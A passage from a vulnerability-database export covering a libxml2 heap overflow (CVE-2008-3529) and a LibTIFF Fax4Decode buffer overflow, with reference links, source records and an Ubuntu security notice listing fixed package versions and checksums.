            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.1,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "db": "BID",
            "id": "31126"
          },
          {
            "db": "PACKETSTORM",
            "id": "72532"
          },
          {
            "db": "PACKETSTORM",
            "id": "80275"
          },
          {
            "db": "PACKETSTORM",
            "id": "69917"
          },
          {
            "db": "PACKETSTORM",
            "id": "70915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "db": "BID",
            "id": "31126"
          },
          {
            "db": "PACKETSTORM",
            "id": "72532"
          },
          {
            "db": "PACKETSTORM",
            "id": "80275"
          },
          {
            "db": "PACKETSTORM",
            "id": "69917"
          },
          {
            "db": "PACKETSTORM",
            "id": "70915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2008-09-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "date": "2008-09-12T00:00:00",
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "date": "2008-09-11T00:00:00",
            "db": "BID",
            "id": "31126"
          },
          {
            "date": "2008-12-02T19:43:58",
            "db": "PACKETSTORM",
            "id": "72532"
          },
          {
            "date": "2009-08-11T22:46:51",
            "db": "PACKETSTORM",
            "id": "80275"
          },
          {
            "date": "2008-09-12T20:19:07",
            "db": "PACKETSTORM",
            "id": "69917"
          },
          {
            "date": "2008-10-14T20:43:05",
            "db": "PACKETSTORM",
            "id": "70915"
          },
          {
            "date": "2008-09-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "date": "2008-10-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "date": "2008-09-12T16:56:20.493000",
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-02-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "date": "2021-11-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "date": "2013-03-05T18:04:00",
            "db": "BID",
            "id": "31126"
          },
          {
            "date": "2023-05-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "date": "2012-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "80275"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "libxml2 of  xmlParseAttValueComplex Heap-based buffer overflow vulnerability in functions",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201103-0291

    Vulnerability from variot - Updated: 2026-03-09 20:22

    Buffer overflow in Fax4Decode in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF Internet Fax image file that has been compressed using CCITT Group 4 encoding, related to the EXPAND2D macro in libtiff/tif_fax3.h. NOTE: some of these details are obtained from third party information. plural Apple Product LIBTIFF Is libtiff/tif_fax3.h. libTIFF is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. NOTE: This BID was previously titled 'Apple iTunes libTIFF CCITT Group 4 Encoded TIFF Image Buffer Overflow Vulnerability' but has been changed to better reflect the affected library. Note (March 30, 2011): This issue has not been patched as expected. This library contains some command line tools for working with TIFF files. This issue affects the Debian 5.0 Lenny package only.

    For the oldstable distribution (lenny), these problems have been fixed in version 3.8.2-11.4.

    For the stable distribution (squeeze), these problems have been fixed in version 3.9.4-5+squeeze1.

    For the testing distribution, the first two problems have been fixed in version 3.9.4-8, the last problem will be fixed soon.

    For the unstable distribution (sid), these problems have been fixed in version 3.9.4-9.

    We recommend that you upgrade your tiff packages. =========================================================== Ubuntu Security Notice USN-1085-2 March 15, 2011 tiff regression https://launchpad.net/bugs/731540 ===========================================================

    A security issue affects the following Ubuntu releases:

    Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10

    This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

    The problem can be corrected by upgrading your system to the following package versions:

    Ubuntu 6.06 LTS: libtiff4 3.7.4-1ubuntu3.10

    Ubuntu 8.04 LTS: libtiff4 3.8.2-7ubuntu3.8

    Ubuntu 9.10: libtiff4 3.8.2-13ubuntu0.5

    Ubuntu 10.04 LTS: libtiff4 3.9.2-2ubuntu0.5

    Ubuntu 10.10: libtiff4 3.9.4-2ubuntu0.2

    After a standard system update you need to restart your session to make all the necessary changes.

    Details follow:

    USN-1085-1 fixed vulnerabilities in the system TIFF library. The upstream fixes were incomplete and created problems for certain CCITTFAX4 files.

    We apologize for the inconvenience.

    Original advisory details:

    Sauli Pahlman discovered that the TIFF library incorrectly handled invalid td_stripbytecount fields. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could crash the application, leading to a denial of service. This issue only affected Ubuntu 10.04 LTS and 10.10. (CVE-2010-2482)

    Sauli Pahlman discovered that the TIFF library incorrectly handled TIFF files with an invalid combination of SamplesPerPixel and Photometric values. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could crash the application, leading to a denial of service. This issue only affected Ubuntu 10.10. (CVE-2010-2482)

    Nicolae Ghimbovschi discovered that the TIFF library incorrectly handled invalid ReferenceBlackWhite values. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could crash the application, leading to a denial of service. (CVE-2010-2595)

    Sauli Pahlman discovered that the TIFF library incorrectly handled certain default fields. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could crash the application, leading to a denial of service. (CVE-2010-2597, CVE-2010-2598)

    It was discovered that the TIFF library incorrectly validated certain data types. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could crash the application, leading to a denial of service. (CVE-2010-2630)

    It was discovered that the TIFF library incorrectly handled downsampled JPEG data. This issue only affected Ubuntu 10.04 LTS and 10.10. (CVE-2010-3087)

    It was discovered that the TIFF library incorrectly handled certain JPEG data. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS and 9.10. (CVE-2011-0191)

    It was discovered that the TIFF library incorrectly handled certain TIFF FAX images. (CVE-2011-0191)

    Updated packages for Ubuntu 6.06 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.10.diff.gz
      Size/MD5:    24707 92ee677a20237cfdb17b5dcbe024fc81
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.10.dsc
      Size/MD5:     1445 19186c480eda8ade1d4fd194a7e08bf6
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz
      Size/MD5:  1280113 02cf5c3820bda83b35bb35b45ae27005
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_amd64.deb
      Size/MD5:   220784 7b8f336c5190b816fb92f498b30755c9
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_amd64.deb
      Size/MD5:   283278 2633a7f81897814f7bddb303f6952b34
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_amd64.deb
      Size/MD5:   488554 bd11ebd5ae319660ec0eff4f22b55268
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_amd64.deb
      Size/MD5:    45210 2d75169ed1d84f4907d505780123691d
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_amd64.deb
      Size/MD5:    50372 d606202ec431cee4d43658887b7c53f7
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_i386.deb
      Size/MD5:   206424 d346905ce628f3b5afdfe1a4b5e46ee8
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_i386.deb
      Size/MD5:   260146 f8a0af4bb2a87fab5833e8bea85b4179
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_i386.deb
      Size/MD5:   462812 81f1884d1f83fbc7cf670233e79e464b
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_i386.deb
      Size/MD5:    45144 047a98941044eb476ff601a50a94cb97
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_i386.deb
      Size/MD5:    49650 0298317461310597a873c28bbe6c9c2d
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_powerpc.deb
      Size/MD5:   240378 8f832fa2e7ca2122ea17b8440db407a3
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_powerpc.deb
      Size/MD5:   289250 7118c8a2b9ee67fb759d89631b80ec33
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_powerpc.deb
      Size/MD5:   477164 46d81e5cca275c4f9fa490bccf5e1b54
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_powerpc.deb
      Size/MD5:    47366 8f493b29a1c6af1ede1ae20bb340542e
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_powerpc.deb
      Size/MD5:    52018 9cbc82320c0fb9160a55d9e966935308
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_sparc.deb
      Size/MD5:   209294 1c075ff5d8fe054cfbe59767156f2b12
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_sparc.deb
      Size/MD5:   271226 083721bbf42b3a9c2ba0619725cdea1c
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_sparc.deb
      Size/MD5:   467842 244140481e39cbae1caeea1cbc7242fb
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_sparc.deb
      Size/MD5:    45072 0ecf1aa2519fd0f70a54e97299a9a2aa
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_sparc.deb
      Size/MD5:    50206 1fd3434ab16f251802c05e69b2ec4172
    

    Updated packages for Ubuntu 8.04 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.8.diff.gz
      Size/MD5:    23098 1ee89aac13034400cc5f65bc82350576
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.8.dsc
      Size/MD5:     1534 db81aff18857a6a792e8e3d9f6419c25
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz
      Size/MD5:  1333780 e6ec4ab957ef49d5aabc38b7a376910b
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_amd64.deb
      Size/MD5:   186052 117b7fef507321d3b40f31e82121d65c
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_amd64.deb
      Size/MD5:   583498 356ff0e0f3fa15764371a8d0ffbd2574
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_amd64.deb
      Size/MD5:   132044 f21e514b5f9ffa5e083d48e3ff2876be
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_amd64.deb
      Size/MD5:     5060 bd0be2af72fb9789ef27a5cf3445a960
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_amd64.deb
      Size/MD5:    10482 a49a0b07d12a18248a56d1c64322687b
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_i386.deb
      Size/MD5:   175314 d510325b149f2106114857e9cd1887a1
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_i386.deb
      Size/MD5:   552824 044e167a1106988f710d4b26cd480c13
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_i386.deb
      Size/MD5:   123468 8c41a5b4deb4daf59a27aa18bafc2a33
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_i386.deb
      Size/MD5:     5044 221fabdeb10a45b0e39b30fcd9876d57
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_i386.deb
      Size/MD5:     9934 139ed154385849ed4a76c21f14d1824c
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_lpia.deb
      Size/MD5:   177010 f861eceecd6f08085a7e66038b28d148
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_lpia.deb
      Size/MD5:   555294 27b3f40726cd5cf866dd80b5fb5f652d
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_lpia.deb
      Size/MD5:   124582 a101756bd948bc2d526bbb3793655c46
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_lpia.deb
      Size/MD5:     4916 0fde80306a67eb766b878040048003fa
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_lpia.deb
      Size/MD5:     9976 36fdc7a9337f4a5391a5d951624775df
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_powerpc.deb
      Size/MD5:   223488 04f35d447aa797b255c249719f467896
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_powerpc.deb
      Size/MD5:   577476 53e4f31126ecae60b54a2614c29a02ef
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_powerpc.deb
      Size/MD5:   135174 24d5e5f4e4903eae9ba2b4163eb0ab44
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_powerpc.deb
      Size/MD5:     7512 a361eb4c3985a90189342aced3932676
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_powerpc.deb
      Size/MD5:    13288 2f458ba98bbf136958d2a8cdc87a83ab
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_sparc.deb
      Size/MD5:   178860 d48dc98bba2aaaf1830ad3a9d69b99db
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_sparc.deb
      Size/MD5:   558838 c9ffd065811bf117f5c57dae82c4173b
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_sparc.deb
      Size/MD5:   123254 e11f44522f5cef8b3f4a8a633be5437d
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_sparc.deb
      Size/MD5:     4796 498f87c694b19560fe59ee3afb605af4
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_sparc.deb
      Size/MD5:    10700 5bb66a32a926f8fbd1a5b864a3d88cd7
    

    Updated packages for Ubuntu 9.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.5.diff.gz
      Size/MD5:    43070 e8b35ecf046a7c3619e1d9929de8b830
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.5.dsc
      Size/MD5:     1978 d8a8180b56ba05c422d4b443afb1d44e
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz
      Size/MD5:  1333780 e6ec4ab957ef49d5aabc38b7a376910b
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.8.2-13ubuntu0.5_all.deb
      Size/MD5:   348112 a84bc452f3a0eea39c87ac3ac744112c
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_amd64.deb
      Size/MD5:   191416 300ef146f5155ff8ccdf51e8a684ff34
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_amd64.deb
      Size/MD5:   252426 b78ec6fcac494ac67fb4b357632dace3
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_amd64.deb
      Size/MD5:   135940 d3f0cb6e3491b6d335e905ddb2139dfc
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_amd64.deb
      Size/MD5:     6332 b7da9edb5b42f9c08596a6b1966cb6e0
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_amd64.deb
      Size/MD5:    12004 3107c05e0644d55184c568fbd205c8d4
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_i386.deb
      Size/MD5:   176368 b2b0a5ed89fa9405dea1a1944bf4e606
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_i386.deb
